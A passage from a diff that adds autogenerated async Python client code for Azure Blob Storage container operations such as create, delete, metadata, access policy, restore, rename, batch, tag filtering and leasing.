url=self._config.url, + restype=restype, + version=self._config.version, + timeout=timeout, + metadata=metadata, + access=access, + request_id_parameter=request_id_parameter, + default_encryption_scope=_default_encryption_scope, + prevent_encryption_scope_override=_prevent_encryption_scope_override, + template_url=self.create.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def get_properties( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> None: + """returns all user-defined metadata and system properties for the specified container. The data + returned does not include the container's list of blobs. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + + _lease_id = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_get_properties_request( + url=self._config.url, + restype=restype, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.get_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-public-access']=self._deserialize('str', response.headers.get('x-ms-blob-public-access')) + response_headers['x-ms-has-immutability-policy']=self._deserialize('bool', response.headers.get('x-ms-has-immutability-policy')) + response_headers['x-ms-has-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-has-legal-hold')) + response_headers['x-ms-default-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-default-encryption-scope')) + response_headers['x-ms-deny-encryption-scope-override']=self._deserialize('bool', response.headers.get('x-ms-deny-encryption-scope-override')) + response_headers['x-ms-immutable-storage-with-versioning-enabled']=self._deserialize('bool', response.headers.get('x-ms-immutable-storage-with-versioning-enabled')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_properties.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def delete( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """operation marks the specified container for deletion. The container and any blobs contained + within it are later deleted during garbage collection. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_delete_request( + url=self._config.url, + restype=restype, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.delete.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + delete.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def set_metadata( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """operation sets one or more user-defined name-value pairs for the specified container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "metadata". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "metadata") # type: str + + _lease_id = None + _if_modified_since = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + + request = build_set_metadata_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + metadata=metadata, + if_modified_since=_if_modified_since, + request_id_parameter=request_id_parameter, + template_url=self.set_metadata.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_metadata.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def get_access_policy( + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> List["_models.SignedIdentifier"]: + """gets the permissions for the specified container. The permissions indicate whether container + data may be accessed publicly. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "acl". Note that overriding this default value may result + in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: list of SignedIdentifier, or the result of cls(response) + :rtype: list[~azure.storage.blob.models.SignedIdentifier] + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[List["_models.SignedIdentifier"]] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "acl") # type: str + + _lease_id = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_get_access_policy_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.get_access_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-blob-public-access']=self._deserialize('str', response.headers.get('x-ms-blob-public-access')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('[SignedIdentifier]', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_access_policy.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def set_access_policy( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + access: Optional[Union[str, "_models.PublicAccessType"]] = None, + request_id_parameter: Optional[str] = None, + container_acl: Optional[List["_models.SignedIdentifier"]] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """sets the permissions for the specified container. The permissions indicate whether blobs in a + container may be accessed publicly. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param access: Specifies whether data in the container may be accessed publicly and the level + of access. Default value is None. + :type access: str or ~azure.storage.blob.models.PublicAccessType + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param container_acl: the acls for the container. Default value is None. + :type container_acl: list[~azure.storage.blob.models.SignedIdentifier] + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "acl". Note that overriding this default value may result + in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "acl") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + serialization_ctxt = {"xml": {'name': 'SignedIdentifiers', 'wrapped': True, 'itemsName': 'SignedIdentifier'}} + if container_acl is not None: + _content = self._serialize.body(container_acl, '[SignedIdentifier]', is_xml=True, serialization_ctxt=serialization_ctxt) + else: + _content = None + + request = build_set_access_policy_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + lease_id=_lease_id, + access=access, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.set_access_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_access_policy.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def restore( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + deleted_container_name: Optional[str] = None, + deleted_container_version: Optional[str] = None, + **kwargs: Any + ) -> None: + """Restores a previously-deleted container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param deleted_container_name: Optional. Version 2019-12-12 and later. Specifies the name of + the deleted container to restore. Default value is None. + :type deleted_container_name: str + :param deleted_container_version: Optional. Version 2019-12-12 and later. Specifies the + version of the deleted container to restore. Default value is None. + :type deleted_container_version: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "undelete". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "undelete") # type: str + + + request = build_restore_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + deleted_container_name=deleted_container_name, + deleted_container_version=deleted_container_version, + template_url=self.restore.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + restore.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def rename( # pylint: disable=inconsistent-return-statements + self, + source_container_name: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + source_lease_id: Optional[str] = None, + **kwargs: Any + ) -> None: + """Renames an existing container. + + :param source_container_name: Required. Specifies the name of the container to rename. + :type source_container_name: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param source_lease_id: A lease ID for the source path. If specified, the source path must have + an active lease and the lease ID must match. Default value is None. + :type source_lease_id: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "rename". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "rename") # type: str + + + request = build_rename_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + source_container_name=source_container_name, + timeout=timeout, + request_id_parameter=request_id_parameter, + source_lease_id=source_lease_id, + template_url=self.rename.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + rename.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def submit_batch( + self, + content_length: int, + body: IO, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> IO: + """The Batch operation allows multiple API calls to be embedded into a single HTTP request. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword multipart_content_type: Required. The value of this header must be multipart/mixed + with a batch boundary. Example header value: multipart/mixed; boundary=batch_:code:``. + :paramtype multipart_content_type: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "batch". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + multipart_content_type = kwargs.pop('multipart_content_type') # type: str + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "batch") # type: str + + _content = self._serialize.body(body, 'IO') + + request = build_submit_batch_request( + url=self._config.url, + multipart_content_type=multipart_content_type, + restype=restype, + comp=comp, + version=self._config.version, + content=_content, + content_length=content_length, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.submit_batch.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + submit_batch.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def filter_blobs( + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + where: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + **kwargs: Any + ) -> "_models.FilterBlobSegment": + """The Filter Blobs operation enables callers to list blobs in a container whose tags match a + given search expression. Filter blobs searches within the given container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param where: Filters the results to return only to return only blobs whose tags match the + specified expression. Default value is None. + :type where: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "blobs". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: FilterBlobSegment, or the result of cls(response) + :rtype: ~azure.storage.blob.models.FilterBlobSegment + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.FilterBlobSegment"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "blobs") # type: str + + + request = build_filter_blobs_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + where=where, + marker=marker, + maxresults=maxresults, + template_url=self.filter_blobs.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('FilterBlobSegment', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + filter_blobs.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def acquire_lease( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + duration: Optional[int] = None, + proposed_lease_id: Optional[str] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param duration: Specifies the duration of the lease, in seconds, or negative one (-1) for a + lease that never expires. A non-infinite lease can be between 15 and 60 seconds. A lease + duration cannot be changed using renew or change. Default value is None. + :type duration: int + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. Default value is None. + :type proposed_lease_id: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "acquire". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: 